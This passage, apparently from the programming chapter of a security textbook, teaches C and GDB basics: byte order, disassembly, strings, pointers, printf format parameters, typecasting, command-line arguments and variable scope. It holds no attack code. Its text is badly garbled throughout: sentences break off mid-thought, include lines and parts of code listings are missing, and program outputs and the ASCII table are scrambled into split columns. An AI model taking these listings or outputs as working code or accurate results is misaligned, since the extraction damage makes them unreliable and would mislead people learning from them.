when a full four-byte word is shown as 0x00fc45c7, but when the first four bytes
are shown byte by byte, they are in the order of 0xc7, 0x45, 0xfc, and 0x00
...
For example,
if four bytes are to be interpreted as a single value, the bytes must be used
in reverse order
...
Revisiting these
values displayed both as hexadecimal and unsigned decimals might help
clear up any confusion
...
Exit anyway? (y or n) y
reader@hacking:~/booksrc $ bc -ql
199*(256^3) + 69*(256^2) + 252*(256^1) + 0*(256^0)
3343252480
0*(256^3) + 252*(256^2) + 69*(256^1) + 199*(256^0)
16532935
quit
reader@hacking:~/booksrc $

P rog ra m min g

29

The first four bytes are shown both in hexadecimal and standard unsigned
decimal notation
...
The byte order of a given architecture is an
important detail to be aware of
...

In addition to converting byte order, GDB can do other conversions with
the examine command
...
The examine
command also accepts the format letter i, short for instruction, to display the
memory as disassembled assembly language instructions
...
/a
...
so
...

(gdb) break main
Breakpoint 1 at 0x8048384: file firstprog
...

(gdb) run
Starting program: /home/reader/booksrc/a
...
c:6
6
for(i=0; i < 10; i++)
(gdb) i r $eip
eip
0x8048384
0x8048384
(gdb) x/i $eip
0x8048384 :
mov
DWORD PTR [ebp-4],0x0
(gdb) x/3i $eip
0x8048384 :
mov
DWORD PTR [ebp-4],0x0
0x804838b :
cmp
DWORD PTR [ebp-4],0x9
0x804838f :
jle
0x8048393
(gdb) x/7xb $eip
0x8048384 :
0xc7
0x45
0xfc
0x00
(gdb) x/i $eip
0x8048384 :
mov
DWORD PTR [ebp-4],0x0
(gdb)

0x00

0x00

0x00

In the output above, the a
...
Since the EIP register is pointing to memory that actually contains machine language instructions, they disassemble quite nicely
...

8048384:

c7 45 fc 00 00 00 00

mov

DWORD PTR [ebp-4],0x0

This assembly instruction will move the value of 0 into memory located
at the address stored in the EBP register, minus 4
...
Basically, this command will zero out the

30

0x200

variable i for the for loop
...
The memory at this location can be
examined several different ways
...
The examine command can examine this memory address
directly or by doing the math on the fly
...
This variable named $1 can be used later to quickly re-access
a particular location in memory
...

Let’s execute the current instruction using the command nexti, which is
short for next instruction
...

(gdb) nexti
0x0804838b
6
for(i=0; i < 10; i++)
(gdb) x/4xb $1
0xbffff804:
0x00
0x00
0x00
0x00
(gdb) x/dw $1
0xbffff804:
0
(gdb) i r eip
eip
0x804838b
0x804838b
(gdb) x/i $eip
0x804838b :
cmp
DWORD PTR [ebp-4],0x9
(gdb)

As predicted, the previous command zeroes out the 4 bytes found at EBP
minus 4, which is memory set aside for the C variable i
...
The next few instructions actually make more sense to
talk about in a group
...
The next instruction,
jle stands for jump if less than or equal to
...
In this case the
instruction says to jump to the address 0x8048393 if the value stored in memory
for the C variable i is less than or equal to the value 9
...
This will cause the EIP to jump to the address 0x80483a6
...
The first address of 0x8048393 (shown in
bold) is simply the instruction found after the fixed jump instruction, and
the second address of 0x80483a6 (shown in italics) is located at the end of the
function
...

(gdb) nexti
0x0804838f
6
for(i=0; i < 10; i++)
(gdb) x/i $eip
0x804838f :
jle
0x8048393
(gdb) nexti
8
printf("Hello, world!\n");
(gdb) i r eip
eip
0x8048393
0x8048393
(gdb) x/2i $eip
0x8048393 :
mov
DWORD PTR [esp],0x8048484
0x804839a :
call
0x80482a0
(gdb)

As expected, the previous two instructions let the program execution
flow down to 0x8048393, which brings us to the next two instructions
...
But what is ESP
pointing to?
(gdb) i r esp
esp
(gdb)

0xbffff800

0xbffff800

Currently, ESP points to the memory address 0xbffff800, so when the mov
instruction is executed, the address 0x8048484 is written there
...

(gdb) x/2xw 0x8048484
0x8048484:
0x6c6c6548
(gdb) x/6xb 0x8048484
0x8048484:
0x48
0x65
(gdb) x/6ub 0x8048484
0x8048484:
72
101
(gdb)

0x6f57206f
0x6c

0x6c

0x6f

0x20

108

108

111

32

A trained eye might notice something about the memory here, in particular the range of the bytes
...
These bytes fall within
the printable ASCII range
...

The bytes 0x48, 0x65, 0x6c, and 0x6f all correspond to letters in the alphabet on
the ASCII table shown below
...

ASCII Table
Oct
Dec Hex
Char
Oct
Dec
Hex
Char
-----------------------------------------------------------000
0
00
NUL '\0'
100
64
40
@
001
1
01
SOH
101
65
41
A
002
2
02
STX
102
66
42
B
003
3
03
ETX
103
67
43
C
004
4
04
EOT
104
68
44
D
005
5
05
ENQ
105
69
45
E
006
6
06
ACK
106
70
46
F
007
7
07
BEL '\a'
107
71
47
G
010
8
08
BS '\b'
110
72
48
H
011
9
09
HT '\t'
111
73
49
I
012
10
0A
LF '\n'
112
74
4A
J
013
11
0B
VT '\v'
113
75
4B
K
014
12
0C
FF '\f'
114
76
4C
L
015
13
0D
CR '\r'
115
77
4D
M
016
14
0E
SO
116
78
4E
N
017
15
0F
SI
117
79
4F
O
020
16
10
DLE
120
80
50
P
021
17
11
DC1
121
81
51
Q

P rog ra m min g

33

022
023
024
025
026
027
030
031
032
033
034
035
036
037
040
041
042
043
044
045
046
047
050
051
052
053
054
055
056
057
060
061
062
063
064
065
066
067
070
071
072
073
074
075
076
077

18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63

12
13
14
15
16
17
18
19
1A
1B
1C
1D
1E
1F
20
21
22
23
24
25
26
27
28
29
2A
2B
2C
2D
2E
2F
30
31
32
33
34
35
36
37
38
39
3A
3B
3C
3D
3E
3F

DC2
DC3
DC4
NAK
SYN
ETB
CAN
EM
SUB
ESC
FS
GS
RS
US
SPACE
!
"
#
$
%
&
'
(
)
*
+
,

...
The c format letter can be used to automatically
look up a byte on the ASCII table, and the s format letter will display an
entire string of character data
...
This string is the argument for the printf() function, which indicates that moving the address of this string to the address
stored in ESP (0x8048484) has something to do with this function
...

(gdb) x/2i $eip
0x8048393 :
mov
DWORD PTR [esp],0x8048484
0x804839a :
call
0x80482a0
(gdb) x/xw $esp
0xbffff800:
0xb8000ce0
(gdb) nexti
0x0804839a
8
printf("Hello, world!\n");
(gdb) x/xw $esp
0xbffff800:
0x08048484
(gdb)

The next instruction is actually called the printf() function; it prints the
data string
...

(gdb) x/i $eip
0x804839a :
call
0x80482a0
(gdb) nexti
Hello, world!
6
for(i=0; i < 10; i++)
(gdb)

Continuing to use GDB to debug, let’s examine the next two instructions
...

(gdb) x/2i $eip
0x804839f :
0x80483a2 :
(gdb)

lea
inc

eax,[ebp-4]
DWORD PTR [eax]

These two instructions basically just increment the variable i by 1
...
The execution of this
instruction is shown below
...
The execution of this instruction is also
shown below
...
This behavior corresponds to a portion of C
code in which the variable i is incremented in the for loop
...

(gdb) x/i $eip
0x80483a4 :
(gdb)

jmp

0x804838b

When this instruction is executed, it will send the program back to the
instruction at address 0x804838b
...

Looking at the full disassembly again, you should be able to tell which
parts of the C code have been compiled into which machine instructions
...

(gdb) list
1
#include ...
The program execution will jump back to the compare instruction, continue to execute the
printf() call, and increment the counter variable until it finally equals 10
...

0x260

Back to Basics
Now that the idea of programming is less abstract, there are a few other
important concepts to know about C
...
In the same way
that knowing a little about Latin can greatly improve one’s understanding of

P rog ra m min g

37

the English language, knowledge of low-level programming concepts can
assist the comprehension of higher-level ones
...

0x261

Strings

The value "Hello, world!\n" passed to the printf() function in the previous
program is a string—technically, a character array
...
A 20-character array is simply 20
adjacent characters located in memory
...

The char_array
...

char_array
...
h>
int main()
{
char str_a[20];
str_a[0] = 'H';
str_a[1] = 'e';
str_a[2] = 'l';
str_a[3] = 'l';
str_a[4] = 'o';
str_a[5] = ',';
str_a[6] = ' ';
str_a[7] = 'w';
str_a[8] = 'o';
str_a[9] = 'r';
str_a[10] = 'l';
str_a[11] = 'd';
str_a[12] = '!';
str_a[13] = '\n';
str_a[14] = 0;
printf(str_a);
}

The GCC compiler can also be given the -o switch to define the output
file to compile to
...

reader@hacking:~/booksrc $ gcc -o char_array char_array
...
/char_array
Hello, world!
reader@hacking:~/booksrc $

In the preceding program, a 20-element character array is defined as
str_a, and each element of the array is written to, one by one
...
Also notice that the last character is a 0
...
) The character array was defined, so 20 bytes
are allocated for it, but only 12 of these bytes are actually used
...
The remaining extra bytes are
just garbage and will be ignored
...

Since setting each character in a character array is painstaking and
strings are used fairly often, a set of standard functions was created for string
manipulation
...

The order of the function’s arguments is similar to Intel assembly syntax:
destination first and then source
...
c program can be rewritten
using strcpy() to accomplish the same thing using the string library
...
h since
it uses a string function
...
c
#include ...
h>
int main() {
char str_a[20];
strcpy(str_a, "Hello, world!\n");
printf(str_a);
}

Let’s take a look at this program with GDB
...
The debugger will pause the program at
each breakpoint, giving us a chance to examine registers and memory
...

reader@hacking:~/booksrc $ gcc -g -o char_array2 char_array2
...
/char_array2
Using host libthread_db library "/lib/tls/i686/cmov/libthread_db
...
1"
...
h>
2
#include ...
c, line 6
...

Make breakpoint pending on future shared library load? (y or [n]) y
Breakpoint 2 (strcpy) pending
...
c, line 8
...
At each
breakpoint, we’re going to look at EIP and the instructions it points to
...

(gdb) run
Starting program: /home/reader/booksrc/char_array2
Breakpoint 4 at 0xb7f076f4
Pending breakpoint "strcpy" resolved
Breakpoint 1, main () at char_array2
...

Breakpoint 4, 0xb7f076f4 in strcpy () from /lib/tls/i686/cmov/libc
...
6
(gdb) i r eip
eip
0xb7f076f4
0xb7f076f4
(gdb) x/5i $eip
0xb7f076f4 : mov
esi,DWORD PTR [ebp+8]
0xb7f076f7 : mov
eax,DWORD PTR [ebp+12]
0xb7f076fa : mov
ecx,esi
0xb7f076fc : sub
ecx,eax
0xb7f076fe : mov
edx,eax
(gdb) continue
Continuing
...
c:8
8
printf(str_a);
(gdb) i r eip
eip
0x80483d7
0x80483d7
(gdb) x/5i $eip
0x80483d7 :
lea
eax,[ebp-40]
0x80483da :
mov
DWORD PTR [esp],eax
0x80483dd :
call
0x80482d4
0x80483e2 :
leave
0x80483e3 :
ret
(gdb)

40

0x200

The address in EIP at the middle breakpoint is different because the
code for the strcpy() function comes from a loaded library
...
I’d like to
point out that EIP is able to travel from the main code to the strcpy() code
and back again
...
The stack lets EIP return through long
chains of function calls
...
In the output below, the stack backtrace is shown at each breakpoint
...

Start it from the beginning? (y or n) y
Starting program: /home/reader/booksrc/char_array2
Error in re-setting breakpoint 4:
Function "strcpy" not defined
...
c:7
7
strcpy(str_a, "Hello, world!\n");
(gdb) bt
#0 main () at char_array2
...

Breakpoint 4, 0xb7f076f4 in strcpy () from /lib/tls/i686/cmov/libc
...
6
(gdb) bt
#0 0xb7f076f4 in strcpy () from /lib/tls/i686/cmov/libc
...
6
#1 0x080483d7 in main () at char_array2
...

Breakpoint 3, main () at char_array2
...
c:8
(gdb)

At the middle breakpoint, the backtrace of the stack shows its record of
the strcpy() call
...
This is due to an exploit protection
method that is turned on by default in the Linux kernel since 2
...
11
...

0x262

Signed, Unsigned, Long, and Short

By default, numerical values in C are signed, which means they can be both
negative and positive
...
Since it’s all just memory in the end, all numerical values must be stored
in binary, and unsigned values make the most sense in binary
...
A 32-bit signed integer is still just 32 bits, which means it can
P rog ra m min g

41

only be in one of 232 possible bit combinations
...
Essentially, one of
the bits is a flag marking the value positive or negative
...
Two’s complement represents negative numbers in a form suited for binary adders—when a negative value in
two’s complement is added to a positive number of the same magnitude, the
result will be 0
...
It sounds strange, but it works and
allows negative numbers to be added in combination with positive numbers
using simple binary adders
...
For simplicity’s sake, 8-bit numbers are used in this example
...
Then all the
bits are flipped, and 1 is added to result in the two’s complement representation for negative 73, 10110111
...
The program pcalc shows the value 256
because it’s not aware that we’re only dealing with 8-bit values
...
This example might shed some
light on how two’s complement works its magic
...
An unsigned integer would be declared
with unsigned int
...
The actual sizes will vary
depending on the architecture the code is compiled for
...
This works like a function that takes a data type as its input and returns
the size of a variable declared with that data type for the target architecture
...
c program explores the sizes of various data types, using
the sizeof() function
...
c
#include ...

It uses something called a format specifier to display the value returned from
the sizeof() function calls
...

reader@hacking:~/booksrc $ gcc datatype_sizes
...
/a
...
A float is also four bytes, while a char only needs
a single byte
...

0x263

Pointers

The EIP register is a pointer that “points” to the current instruction during a
program’s execution by containing its memory address
...
Since the physical memory cannot actually be moved, the
information in it must be copied
...
This is also expensive from a memory standpoint, since space for
the new destination copy must be saved or allocated before the source can be
copied
...
Instead of copying a large
block of memory, it is much simpler to pass around the address of the beginning of that block of memory
...

Since memory on the x 86 architecture uses 32-bit addressing, pointers are
also 32 bits in size (4 bytes)
...
Instead of defining a variable of that type, a pointer is
defined as something that points to data of that type
...
c program
is an example of a pointer being used with the char data type, which is only
1 byte in size
...
c
#include ...
h>
int main() {
char str_a[20];
char *pointer;
char *pointer2;

// A 20-element character array
// A pointer, meant for a character array
// And yet another one

strcpy(str_a, "Hello, world!\n");
pointer = str_a; // Set the first pointer to the start of the array
...

// Print it
...

// Print again
...
When the character array is referenced like this,
it is actually a pointer itself
...
The second pointer is set to the
first pointer’s address plus two, and then some things are printed (shown in
the output below)
...
c
reader@hacking:~/booksrc $
...
The program is recompiled, and a
breakpoint is set on the tenth line of the source code
...

reader@hacking:~/booksrc $ gcc -g -o pointer pointer
...
/pointer
Using host libthread_db library "/lib/tls/i686/cmov/libthread_db
...
1"
...
h>
2
#include ...

(gdb)
11
printf(pointer);
12
13
pointer2 = pointer + 2; // Set the second one 2 bytes further in
...

15
strcpy(pointer2, "y you guys!\n"); // Copy into that spot
...

17
}
(gdb) break 11
Breakpoint 1 at 0x80483dd: file pointer
...

(gdb) run
Starting program: /home/reader/booksrc/pointer
Breakpoint 1, main () at pointer
...
Remember that
the string itself isn’t stored in the pointer variable—only the memory address
0xbffff7e0 is stored there
...
The address-of operator is a unary operator,
which simply means it operates on a single argument
...
When it’s used, the address
of that variable is returned, instead of the variable itself
...

(gdb) x/xw &pointer
0xbffff7dc:
0xbffff7e0
(gdb) print &pointer
$1 = (char **) 0xbffff7dc
(gdb) print pointer
$2 = 0xbffff7e0 "Hello, world!\n"
(gdb)

When the address-of operator is used, the pointer variable is shown to
be located at the address 0xbffff7dc in memory, and it contains the address
0xbffff7e0
...
The addressof
...
This line is shown in bold below
...
c
#include ...

reader@hacking:~/booksrc $ gcc -g addressof
...
/a
...
so
...

(gdb) list
1
#include ...

8
}
(gdb) break 8
Breakpoint 1 at 0x8048361: file addressof
...

(gdb) run
Starting program: /home/reader/booksrc/a
...
c:8
8
}
(gdb) print int_var
$1 = 5
(gdb) print &int_var
$2 = (int *) 0xbffff804
(gdb) print int_ptr
$3 = (int *) 0xbffff804
(gdb) print &int_ptr
$4 = (int **) 0xbffff800
(gdb)

As usual, a breakpoint is set and the program is executed in the
debugger
...
The first
print command shows the value of int_var, and the second shows its address
using the address-of operator
...

46

0x200

An additional unary operator called the dereference operator exists for use
with pointers
...
It takes the form of an
asterisk in front of the variable name, similar to the declaration of a pointer
...
Used in
GDB, it can retrieve the integer value int_ptr points to
...
c code (shown in addressof2
...
The added printf() functions use format
parameters, which I’ll explain in the next section
...

addressof2
...
h>
int main() {
int int_var = 5;
int *int_ptr;
int_ptr = &int_var; // Put the address of int_var into int_ptr
...
c are as follows
...
c
reader@hacking:~/booksrc $
...
out
int_ptr = 0xbffff834
&int_ptr = 0xbffff830
*int_ptr = 0x00000005
int_var is located at 0xbffff834 and contains 5
int_ptr is located at 0xbffff830, contains 0xbffff834, and points to 5
reader@hacking:~/booksrc $

When the unary operators are used with pointers, the address-of operator can be thought of as moving backward, while the dereference operator
moves forward in the direction the pointer is pointing
...
This
function can also use format strings to print variables in many different formats
...
The way the printf() function has been used in the
previous programs, the "Hello, world!\n" string technically is the format string;
however, it is devoid of special escape sequences
...
Each format parameter
begins with a percent sign (%) and uses a single-character shorthand very
similar to formatting characters used by GDB’s examine command
...
There are also some format parameters that expect
pointers, such as the following
...
The %n
format parameter is unique in that it actually writes data
...

For now, our focus will just be the format parameters used for displaying
data
...
c program shows some examples of different format
parameters
...
c
#include ...
The final printf()
call uses the argument &A, which will provide the address of the variable A
...

reader@hacking:~/booksrc $ gcc -o fmt_strings fmt_strings
...
/fmt_strings
[A] Dec: -73, Hex: ffffffb7, Unsigned: 4294967223
[B] Dec: 31337, Hex: 7a69, Unsigned: 31337
[field width on B] 3: '31337', 10: '
31337', '00031337'
[string] sample Address bffff870
variable A is at address: bffff86c
reader@hacking:~/booksrc $

The first two calls to printf() demonstrate the printing of variables A and B,
using different format parameters
...
The
%d format parameter allows for negative values, while %u does not, since it is
expecting unsigned values
...
This is because A is a negative number stored in two’s
complement, and the format parameter is trying to print it as if it were an
unsigned value
...

The third line in the example, labeled [field width on B], shows the use
of the field-width option in a format parameter
...
However,
this is not a maximum field width—if the value to be outputted is greater
than the field width, the field width will be exceeded
...
When 10 is used as the field width,
5 bytes of blank space are outputted before the output data
...
When 08 is used, for example, the output is 00031337
...
Remember that the variable string is actually a pointer containing
the address of the string, which works out wonderfully, since the %s format
parameter expects its data to be passed by reference
...
This value is displayed as eight
hexadecimal digits, padded by zeros
...
Minimum field widths can be set by putting a
number right after the percent sign, and if the field width begins with 0, it
will be padded with zeros
...
So far, so good
...
One key difference is that the scanf() function expects all
of its arguments to be pointers, so the arguments must actually be variable
addresses—not the variables themselves
...
The input
...

input
...
h>
#include ...
c, the scanf() function is used to set the count variable
...

reader@hacking:~/booksrc $ gcc -o input input
...
/input
Repeat how many times? 3
0 - Hello, world!
1 - Hello, world!
2 - Hello, world!
reader@hacking:~/booksrc $
...

In addition, the ability to output the values of variables allows for debugging in
the program, without the use of a debugger
...

0x265

Typecasting

Typecasting is simply a way to temporarily change a variable’s data type, despite
how it was originally defined
...
The syntax for typecasting is
as follows:
(typecast_data_type) variable

This can be used when dealing with integers and floating-point variables,
as typecasting
...

typecasting
...
h>
int main() {
int a, b;
float c, d;
a = 13;
b = 5;
c = a / b;
d = (float) a / (float) b;

// Divide using integers
...

printf("[integers]\t a = %d\t b = %d\n", a, b);
printf("[floats]\t c = %f\t d = %f\n", c, d);
}

The results of compiling and executing typecasting
...

reader@hacking:~/booksrc $ gcc typecasting
...
/a
...
000000
d = 2
...
However, if these integer variables are typecast into floats, they will
be treated as such
...
6
...
Even though a pointer is just a memory address,
the C compiler still demands a data type for every pointer
...
An integer pointer should only
point to integer data, while a character pointer should only point to character data
...
An integer is four bytes
in size, while a character only takes up a single byte
...
c program will demonstrate and explain these concepts further
...
This is shorthand meant
for displaying pointers and is basically equivalent to 0x%08x
...
c
#include ...

printf("[integer pointer] points to %p, which contains the integer %d\n",
int_pointer, *int_pointer);
int_pointer = int_pointer + 1;
}
for(i=0; i < 5; i++) { // Iterate through the char array with the char_pointer
...
Two pointers are also defined,
one with the integer data type and one with the character data type, and they
are set to point at the start of the corresponding data arrays
...
In the loops, when the integer and character values

52

0x200

are actually printed with the %d and %c format parameters, notice that the
corresponding printf() arguments must dereference the pointer variables
...

reader@hacking:~/booksrc
reader@hacking:~/booksrc
[integer pointer] points
[integer pointer] points
[integer pointer] points
[integer pointer] points
[integer pointer] points
[char pointer] points to
[char pointer] points to
[char pointer] points to
[char pointer] points to
[char pointer] points to
reader@hacking:~/booksrc

$ gcc pointer_types
...
/a
...
Since a char is only 1 byte, the pointer to the next char
would naturally also be 1 byte over
...

In pointer_types2
...
The major changes to the code
are marked in bold
...
c
#include ...

for(i=0; i < 5; i++) { // Iterate through the int array with the int_pointer
...

P rog ra m min g

53

printf("[char pointer] points to %p, which contains the integer %d\n",
char_pointer, *char_pointer);
char_pointer = char_pointer + 1;
}
}

The output below shows the warnings spewed forth from the compiler
...
c
pointer_types2
...
c:12: warning: assignment from incompatible pointer type
pointer_types2
...
But the compiler
and perhaps the programmer are the only ones that care about a pointer’s
type
...

reader@hacking:~/booksrc
[integer pointer] points
[integer pointer] points
[integer pointer] points
[integer pointer] points
[integer pointer] points
[char pointer] points to
[char pointer] points to
[char pointer] points to
[char pointer] points to
[char pointer] points to
reader@hacking:~/booksrc

$
...
out
to 0xbffff810, which contains the char
to 0xbffff814, which contains the char
to 0xbffff818, which contains the char
to 0xbffff81c, which contains the char
to 0xbffff820, which contains the char
0xbffff7f0, which contains the integer
0xbffff7f1, which contains the integer
0xbffff7f2, which contains the integer
0xbffff7f3, which contains the integer
0xbffff7f4, which contains the integer
$

'a'
'e'
'8'
'
'?'
1
0
0
0
2

Even though the int_pointer points to character data that only contains
5 bytes of data, it is still typed as an integer
...
Similarly, the char_pointer’s
address is only incremented by 1 each time, stepping through the 20 bytes of
integer data (five 4-byte integers), one byte at a time
...
The 4-byte value of 0x00000001 is actually stored
in memory as 0x01, 0x00, 0x00, 0x00
...
Since the pointer type determines the
size of the data it points to, it’s important that the type is correct
...
c below, typecasting is just a way to change the type of a
variable on the fly
...
c
#include ...

for(i=0; i < 5; i++) { // Iterate through the int array with the int_pointer
...

printf("[char pointer] points to %p, which contains the integer %d\n",
char_pointer, *char_pointer);
char_pointer = (char *) ((int *) char_pointer + 1);
}
}

In this code, when the pointers are initially set, the data is typecast into
the pointer’s data type
...
To fix that, when 1 is added to the pointers, they must first be typecast into the correct data type so the address is incremented by the correct
amount
...
It doesn’t look too pretty, but it works
...
c
$
...
out
to 0xbffff810, which contains the char
to 0xbffff811, which contains the char
to 0xbffff812, which contains the char
to 0xbffff813, which contains the char
to 0xbffff814, which contains the char
0xbffff7f0, which contains the integer
0xbffff7f4, which contains the integer
0xbffff7f8, which contains the integer
0xbffff7fc, which contains the integer
0xbffff800, which contains the integer
$

'a'
'b'
'c'
'd'
'e'
1
2
3
4
5

P rog ra m min g

55

Naturally, it is far easier just to use the correct data type for pointers
in the first place; however, sometimes a generic, typeless pointer is desired
...

Experimenting with void pointers quickly reveals a few things about typeless
pointers
...

In order to retrieve the value stored in the pointer’s memory address, the
compiler must first know what type of data it is
...
These are fairly intuitive
limitations, which means that a void pointer’s main purpose is to simply hold
a memory address
...
c program can be modified to use a single void
pointer by typecasting it to the proper type each time it’s used
...
This also means a void pointer must always
be typecast when dereferencing it, however
...
c, which uses a void pointer
...
c
#include ...

printf("[char pointer] points to %p, which contains the char '%c'\n",
void_pointer, *((char *) void_pointer));
void_pointer = (void *) ((char *) void_pointer + 1);
}
void_pointer = (void *) int_array;
for(i=0; i < 5; i++) { // Iterate through the int array with the int_pointer
...
c are as
follows
...
c
$
...
out
0xbffff810, which contains the char 'a'
0xbffff811, which contains the char 'b'
0xbffff812, which contains the char 'c'
0xbffff813, which contains the char 'd'
0xbffff814, which contains the char 'e'
to 0xbffff7f0, which contains the integer
to 0xbffff7f4, which contains the integer
to 0xbffff7f8, which contains the integer
to 0xbffff7fc, which contains the integer
to 0xbffff800, which contains the integer
$

1
2
3
4
5

The compilation and output of this pointer_types4
...
c
...

Since the type is taken care of by the typecasts, the void pointer is truly
nothing more than a memory address
...
In pointer_types5
...

pointer_types5
...
h>
int main() {
int i;
char char_array[5] = {'a', 'b', 'c', 'd', 'e'};
int int_array[5] = {1, 2, 3, 4, 5};
unsigned int hacky_nonpointer;
hacky_nonpointer = (unsigned int) char_array;
for(i=0; i < 5; i++) { // Iterate through the int array with the int_pointer
...

printf("[hacky_nonpointer] points to %p, which contains the integer %d\n",
hacky_nonpointer, *((int *) hacky_nonpointer));
hacky_nonpointer = hacky_nonpointer + sizeof(int);
}
}

P rog ra m min g

57

This is rather hacky, but since this integer value is typecast into the
proper pointer types when it is assigned and dereferenced, the end result is
the same
...

reader@hacking:~/booksrc $ gcc pointer_types5
...
/a
...
In the end, after the
program has been compiled, the variables are nothing more than memory
addresses
...

0x266

Command-Line Arguments

Many nongraphical programs receive input in the form of command-line
arguments
...
This tends
to be more efficient and is a useful input method
...
The integer will contain the number of arguments, and
the array of strings will contain each of those arguments
...
c
program and its execution should explain things
...
c
#include ...
c
reader@hacking:~/booksrc $
...
/commandline
reader@hacking:~/booksrc $
...
/commandline
argument #1
this
argument #2
is
argument #3
a
argument #4
test
reader@hacking:~/booksrc $

The zeroth argument is always the name of the executing binary, and
the rest of the argument array (often called an argument vector) contains the
remaining arguments as strings
...
Regardless of this, the argument is passed in
as a string; however, there are standard conversion functions
...
The most common of these functions is atoi(),
which is short for ASCII to integer
...
Observe its usage
in convert
...

convert
...
h>
void usage(char *program_name) {
printf("Usage: %s <# of times to repeat>\n", program_name);
exit(1);
}
int main(int argc, char *argv[]) {
int i, count;
if(argc < 3)
// If fewer than 3 arguments are used,
usage(argv[0]); // display usage message and exit
...

printf("Repeating %d times
...

}

The results of compiling and executing convert
...

reader@hacking:~/booksrc $ gcc convert
...
/a
...
/a
...
/a
...

0 - Hello, world!
1 - Hello, world!
2 - Hello, world!
reader@hacking:~/booksrc $

In the preceding code, an if statement makes sure that three arguments
are used before these strings are accessed
...
In C it’s important to check for these types of conditions and handle them in program logic
...
The convert2
...

convert2
...
h>
void usage(char *program_name) {
printf("Usage: %s <# of times to repeat>\n", program_name);
exit(1);
}
int main(int argc, char *argv[]) {
int i, count;
//
//

if(argc < 3)
// If fewer than 3 arguments are used,
usage(argv[0]); // display usage message and exit
...

printf("Repeating %d times
...

}

The results of compiling and executing convert2
...

reader@hacking:~/booksrc
reader@hacking:~/booksrc
Segmentation fault (core
reader@hacking:~/booksrc

$ gcc convert2
...
/a
...

This results in the program crashing due to a segmentation fault
...
When the program attempts to access an address
that is out of bounds, it will crash and die in what’s called a segmentation fault
...

60

0x200

reader@hacking:~/booksrc $ gcc -g convert2
...
/a
...
so
...

(gdb) run test
Starting program: /home/reader/booksrc/a
...

0xb7ec819b in ?? () from /lib/tls/i686/cmov/libc
...
6
(gdb) where
#0 0xb7ec819b in ?? () from /lib/tls/i686/cmov/libc
...
6
#1 0xb800183c in ?? ()
#2 0x00000000 in ?? ()
(gdb) break main
Breakpoint 1 at 0x8048419: file convert2
...

(gdb) run test
The program being debugged has been started already
...
out test
Breakpoint 1, main (argc=2, argv=0xbffff894) at convert2
...

Program received signal SIGSEGV, Segmentation fault
...
so
...
out"
(gdb) x/s 0xbffff9ce
0xbffff9ce:
"test"
(gdb) x/s 0x00000000
0x0:

(gdb) quit
The program is running
...
The where command will
sometimes show a useful backtrace of the stack; however, in this case, the
stack was too badly mangled in the crash
...
Since the argument vector is a pointer to list of strings, it is actually a
pointer to a list of pointers
...
The first one is the zeroth argument,
the second is the test argument, and the third is zero, which is out of bounds
...

P rog ra m min g

61

0x267

Variable Scoping

Another interesting concept regarding memory in C is variable scoping or
context—in particular, the contexts of variables within functions
...
In fact, multiple calls to the same function all have their own contexts
...
c
...
c
#include ...

reader@hacking:~/booksrc $ gcc scope
...
/a
...

Notice that within the main() function, the variable i is 3, even after calling
func1() where the variable i is 5
...
The best
way to think of this is that each function call has its own version of the
variable i
...
Variables are global if they are defined at the beginning
of the code, outside of any functions
...
c example code shown
below, the variable j is declared globally and set to 42
...

scope2
...
h>
int j = 42; // j is a global variable
...

printf("\t\t\t[in func3] i = %d, j = %d\n", i, j);
}
void func2() {
int i = 7;
printf("\t\t[in func2] i = %d, j = %d\n", i, j);
printf("\t\t[in func2] setting j = 1337\n");
j = 1337; // Writing to j
func3();
printf("\t\t[back in func2] i = %d, j = %d\n", i, j);
}
void func1() {
int i = 5;
printf("\t[in func1] i = %d, j = %d\n", i, j);
func2();
printf("\t[back in func1] i = %d, j = %d\n", i, j);
}
int main() {
int i = 3;
printf("[in main] i = %d, j = %d\n", i, j);
func1();
printf("[back in main] i = %d, j = %d\n", i, j);
}

The results of compiling and executing scope2
...

reader@hacking:~/booksrc $ gcc scope2
...
/a
...
In this case, the compiler prefers to use the local variable
...
The global variable j is just
stored in memory, and every function is able to access that memory
...
Printing the memory addresses of these
variables will give a clearer picture of what's going on
...
c example
code below, the variable addresses are printed using the unary address-of
operator
...
c
#include ...

void func3() {
int i = 11, j = 999; // Here, j is a local variable of func3()
...
c are as follows
...
c
reader@hacking:~/booksrc $
...
out
[in main] i @ 0xbffff834 = 3
[in main] j @ 0x08049988 = 42
[in func1] i @ 0xbffff814 = 5
[in func1] j @ 0x08049988 = 42
[in func2] i @ 0xbffff7f4 = 7
[in func2] j @ 0x08049988 = 42
[in func2] setting j = 1337
[in func3] i @ 0xbffff7d4 = 11
[in func3] j @ 0xbffff7d0 = 999
[back in func2] i @ 0xbffff7f4 = 7
[back in func2] j @ 0x08049988 = 1337
[back in func1] i @ 0xbffff814 = 5
[back in func1] j @ 0x08049988 = 1337
[back in main] i @ 0xbffff834 = 3
[back in main] j @ 0x08049988 = 1337
reader@hacking:~/booksrc $

In this output, it is obvious that the variable j used by func3() is different
than the j used by the other functions
...

Also, notice that the variable i is actually a different memory address for each
function
...
Then the backtrace command shows the record of each function call
on the stack
...
c
reader@hacking:~/booksrc $ gdb -q
...
out
Using host libthread_db library "/lib/tls/i686/cmov/libthread_db
...
1"
...
h>
2
3
int j = 42; // j is a global variable
...

7
printf("\t\t\t[in func3] i @ 0x%08x = %d\n", &i, i);
8
printf("\t\t\t[in func3] j @ 0x%08x = %d\n", &j, j);
9
}

P rog ra m min g

65

10
(gdb) break 7
Breakpoint 1 at 0x8048388: file scope3
...

(gdb) run
Starting program: /home/reader/booksrc/a
...
c:7
7
printf("\t\t\t[in func3] i @ 0x%08x = %d\n", &i, i);
(gdb) bt
#0 func3 () at scope3
...
c:17
#2 0x0804849f in func1 () at scope3
...
c:35
(gdb)

The backtrace also shows the nested function calls by looking at records
kept on the stack
...
Each line in the backtrace corresponds to a stack frame
...
The local
variables contained in each stack frame can be shown in GDB by adding the
word full to the backtrace command
...
c:7
i = 11
j = 999
#1 0x0804841d in func2 () at scope3
...
c:26
i = 5
#3 0x0804852b in main () at scope3
...
The global version of the variable j is used in the other
function’s contexts
...
Similar to global
variables, a static variable remains intact between function calls; however, static
variables are also akin to local variables since they remain local within a particular function context
...
The code in static
...

66

0x200

static
...
h>
void function() { // An example function, with its own context
int var = 5;
static int static_var = 5; // Static variable initialization
printf("\t[in function] var = %d\n", var);
printf("\t[in function] static_var = %d\n", static_var);
